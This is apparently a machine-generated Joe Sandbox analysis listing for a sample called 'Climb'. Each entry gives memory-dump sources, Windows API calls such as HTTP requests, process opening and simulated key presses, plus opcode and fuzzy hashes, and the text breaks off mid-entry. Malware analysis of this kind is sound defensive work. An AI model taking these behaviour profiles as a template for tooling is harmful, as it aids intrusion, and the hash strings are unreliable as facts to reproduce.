                                                                                                                                                                      • Opcode ID: 96b8f0f3776298dfe33e9b4ab0555c678185e4081a5b318f3b9235ccb80b6be2
                                                                                                                                                                      • Instruction ID: b7681359277a99b38a9325e4ffa75d1fcd1b6706679ab1864fcde10234281a43
                                                                                                                                                                      • Opcode Fuzzy Hash: 96b8f0f3776298dfe33e9b4ab0555c678185e4081a5b318f3b9235ccb80b6be2
                                                                                                                                                                      • Instruction Fuzzy Hash: E781AE729043059BCB24EF54C454ABABBE8BF94320F584E1EF985D7250DF34E945CB92
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00588992
                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0058899E
                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00588A79
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00588AAC
                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,00000000), ref: 00588AE4
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 00588B06
                                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00588B1E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 4072528602-3685820393
                                                                                                                                                                      • Opcode ID: 7658a38129e4bbcfdf2841069843f3cbec202e9eef5a89a171a3103d72e89694
                                                                                                                                                                      • Instruction ID: 2b7c506aa5ed66c5c816518a8a20d053ea17a5feacb00a70d9f044dc63696118
                                                                                                                                                                      • Opcode Fuzzy Hash: 7658a38129e4bbcfdf2841069843f3cbec202e9eef5a89a171a3103d72e89694
                                                                                                                                                                      • Instruction Fuzzy Hash: E571BE74600209AFEB25EF95C885FBABFB5FF49310F94045AEC45B72A1CB31A984DB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 004F74D7
                                                                                                                                                                        • Part of subcall function 004F7567: GetClientRect.USER32(?,?), ref: 004F758D
                                                                                                                                                                        • Part of subcall function 004F7567: GetWindowRect.USER32(?,?), ref: 004F75CE
                                                                                                                                                                        • Part of subcall function 004F7567: ScreenToClient.USER32(?,?), ref: 004F75F6
                                                                                                                                                                      • GetDC.USER32 ref: 00536083
                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00536096
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005360A4
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005360B9
                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 005360C1
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00536152
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                      • Opcode ID: 3aa0d1479250b021515ab2145b8d8857d0875f3ad99abeba5cd2eeb3a740c042
                                                                                                                                                                      • Instruction ID: 27c75e2f59194861a080833777c79117a484e1dc68d4a57a0643551f81ce510b
                                                                                                                                                                      • Opcode Fuzzy Hash: 3aa0d1479250b021515ab2145b8d8857d0875f3ad99abeba5cd2eeb3a740c042
                                                                                                                                                                      • Instruction Fuzzy Hash: CF71CF31500209EFCF25DF64C889ABA7FB1FF48320F14866EED559A2A6C7358845EB61
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0056CCB7
                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0056CCDF
                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0056CD0F
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0056CD67
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0056CD7B
                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0056CD86
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                                                                      • Opcode ID: dcd93c10d07cfd950d973295c66b9ea92010d0ba4d72da2cb192cf61ccfbed7e
                                                                                                                                                                      • Instruction ID: 7006e1fdefd8c3ca96c59f04d65f161bee660d603a83d3372e01ec0f878a49ad
                                                                                                                                                                      • Opcode Fuzzy Hash: dcd93c10d07cfd950d973295c66b9ea92010d0ba4d72da2cb192cf61ccfbed7e
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A316D71600248AFD721AF658C88ABB7FFCFB55740B10492AF886D7240DB34DD489B70
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005355AE,?,?,Bad directive syntax error,0058DCD0,00000000,00000010,?,?), ref: 0055A236
                                                                                                                                                                      • LoadStringW.USER32(00000000,?,005355AE,?), ref: 0055A23D
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0055A301
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                      • API String ID: 858772685-4153970271
                                                                                                                                                                      • Opcode ID: 593099f1eda93ba68130344edb39194cb679fee5f4140501e10e2a3f07bc192e
                                                                                                                                                                      • Instruction ID: 60c13b695f70845a0e812c3736779f807e0da56b96fd61cec57f1bc48f9ac25e
                                                                                                                                                                      • Opcode Fuzzy Hash: 593099f1eda93ba68130344edb39194cb679fee5f4140501e10e2a3f07bc192e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D212F3184021EAFCF11ABA0CC1AEFE7B79FF18704F04445ABA15650A2EB75A658DB51
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32 ref: 005529F8
                                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00552A0D
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00552A9A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassMessageNameParentSend
                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                      • API String ID: 1290815626-3381328864
                                                                                                                                                                      • Opcode ID: e6f5fd4b22143e85518cc16b4d2f840f3ff6d8753d79247e646a1fc137e1f9d2
                                                                                                                                                                      • Instruction ID: d41bfcc9ce7364a76a0d98451a282503ee05e5a6f2d578a83818e9fc3cf8ed7a
                                                                                                                                                                      • Opcode Fuzzy Hash: e6f5fd4b22143e85518cc16b4d2f840f3ff6d8753d79247e646a1fc137e1f9d2
                                                                                                                                                                      • Instruction Fuzzy Hash: D0110276288307BAFA246621EC1BDEA3FEDBF56725F200013FD05E40D1FBA5A8485B14
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004F758D
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004F75CE
                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004F75F6
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004F773A
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004F775B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                      • Opcode ID: 33006ca8ae809abebf8cf12050001f9ceac0c60fcaf495bf328df1f9f8de1861
                                                                                                                                                                      • Instruction ID: 3c127840d176a2c5b68394c7e0cfece2b0dfb80a69a4dfb7f11aaed795a081c4
                                                                                                                                                                      • Opcode Fuzzy Hash: 33006ca8ae809abebf8cf12050001f9ceac0c60fcaf495bf328df1f9f8de1861
                                                                                                                                                                      • Instruction Fuzzy Hash: FCC1473990464AEBDB10CFA8C980BFEBBF1FF18310F14841AE995E7250D738A951DB65
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1282221369-0
                                                                                                                                                                      • Opcode ID: 5c763ccc71cd35c4e48249e19448b5e55773eb3405bf5ca9123790c00e3974af
                                                                                                                                                                      • Instruction ID: d3c0321659a522624988e383d1888264dc5685f0588dae425875f8244b52099b
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c763ccc71cd35c4e48249e19448b5e55773eb3405bf5ca9123790c00e3974af
                                                                                                                                                                      • Instruction Fuzzy Hash: EC615875904731AFEF25AF74F885AAD7FB4BF53320F54056DE845A72C2DA3198008BA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00585C24
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00585C65
                                                                                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00585C6B
                                                                                                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00585C6F
                                                                                                                                                                        • Part of subcall function 005879F2: DeleteObject.GDI32(00000000), ref: 00587A1E
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00585CAB
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00585CB8
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00585CEB
                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00585D25
                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00585D34
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3210457359-0
                                                                                                                                                                      • Opcode ID: d3adeeb01c14d094e1bc94a9c0eadffcc3f20c251ae07a7c730946cdb1e5608e
                                                                                                                                                                      • Instruction ID: a9a3c06df8ee2824e27f6f5fc5c6d48923fb55190338208324ff95e4d57c0a8e
                                                                                                                                                                      • Opcode Fuzzy Hash: d3adeeb01c14d094e1bc94a9c0eadffcc3f20c251ae07a7c730946cdb1e5608e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D519B30A41A09BFEF24AF24CC49F983FA1FB14764F104116BE25BA1E0E775A984AF51
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0056CBC7
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0056CBDA
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0056CBEE
                                                                                                                                                                        • Part of subcall function 0056CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0056CCB7
                                                                                                                                                                        • Part of subcall function 0056CC98: GetLastError.KERNEL32 ref: 0056CD67
                                                                                                                                                                        • Part of subcall function 0056CC98: SetEvent.KERNEL32(?), ref: 0056CD7B
                                                                                                                                                                        • Part of subcall function 0056CC98: InternetCloseHandle.WININET(00000000), ref: 0056CD86
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 337547030-0
                                                                                                                                                                      • Opcode ID: 93301e82003d6da002ff0edfe868b2925c2a2a4e0f44669025413e19b1b3c236
                                                                                                                                                                      • Instruction ID: e26e336350177a73eafc44e006965412c2ee0f7cfe22240e60ab9570c6ba4755
                                                                                                                                                                      • Opcode Fuzzy Hash: 93301e82003d6da002ff0edfe868b2925c2a2a4e0f44669025413e19b1b3c236
                                                                                                                                                                      • Instruction Fuzzy Hash: D9317C71601705AFEB219F75DD48A7ABFF8FF54300B04492DF8AA97610CB31E814AB60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00554393: GetWindowThreadProcessId.USER32(?,00000000), ref: 005543AD
                                                                                                                                                                        • Part of subcall function 00554393: GetCurrentThreadId.KERNEL32 ref: 005543B4
                                                                                                                                                                        • Part of subcall function 00554393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00552F00), ref: 005543BB
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00552F0A
                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00552F28
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00552F2C
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00552F36
                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00552F4E
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00552F52
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00552F5C
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00552F70
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00552F74
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2014098862-0
                                                                                                                                                                      • Opcode ID: fd0c3f8d524551dabd707c840399228c867881447cfdc428fc63e97f159700b5
                                                                                                                                                                      • Instruction ID: 242ff832dc39af341684b35477b7d81a758cd60b5246b4ac0ae77e235cc4f391
                                                                                                                                                                      • Opcode Fuzzy Hash: fd0c3f8d524551dabd707c840399228c867881447cfdc428fc63e97f159700b5
                                                                                                                                                                      • Instruction Fuzzy Hash: B501B5306842147BFB106B699C8EF593FA9EF9DB12F110412F718AE1E4C9E16448DBB9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00551D95,?,?,00000000), ref: 00552159
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00551D95,?,?,00000000), ref: 00552160
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00551D95,?,?,00000000), ref: 00552175
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00551D95,?,?,00000000), ref: 0055217D
                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00551D95,?,?,00000000), ref: 00552180
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00551D95,?,?,00000000), ref: 00552190
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00551D95,00000000,?,00551D95,?,?,00000000), ref: 00552198
                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00551D95,?,?,00000000), ref: 0055219B
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,005521C1,00000000,00000000,00000000), ref: 005521B5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                      • Opcode ID: 2705b97808a32771bd3649b5cac69bb2ce8376f64eca149d190eacd4dfc1a77f
                                                                                                                                                                      • Instruction ID: fe56910733fcadde880d63939a96b66242ab2941f61f57adafb8b4762dc783de
                                                                                                                                                                      • Opcode Fuzzy Hash: 2705b97808a32771bd3649b5cac69bb2ce8376f64eca149d190eacd4dfc1a77f
                                                                                                                                                                      • Instruction Fuzzy Hash: 8801A8B5240304BFE610ABA5EC8DF6B7BACEB99711F005411FE05EB1E1CA719804DB30
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0055CF99
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055CFE0
                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0055D047
                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0055D075
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                      • String ID: ,*\$0$<*\
                                                                                                                                                                      • API String ID: 1227352736-1015321224
                                                                                                                                                                      • Opcode ID: e0e67d0d71fb16fc1257c4472df6ebfcf255905afdfddb9b91e6141a4c0d652c
                                                                                                                                                                      • Instruction ID: 62bc48ce1c32decb7ef4f40017c4426ae2c3daa056c771a560f34600ca115249
                                                                                                                                                                      • Opcode Fuzzy Hash: e0e67d0d71fb16fc1257c4472df6ebfcf255905afdfddb9b91e6141a4c0d652c
                                                                                                                                                                      • Instruction Fuzzy Hash: B251C0326043019ED720AE64C869B6BBFF8BF85315F040A2EFD91D21E0EB64C949C762
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0055DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0055DDAC
                                                                                                                                                                        • Part of subcall function 0055DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0055DDBA
                                                                                                                                                                        • Part of subcall function 0055DD87: CloseHandle.KERNEL32(00000000), ref: 0055DE87
                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0057ABCA
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0057ABDD
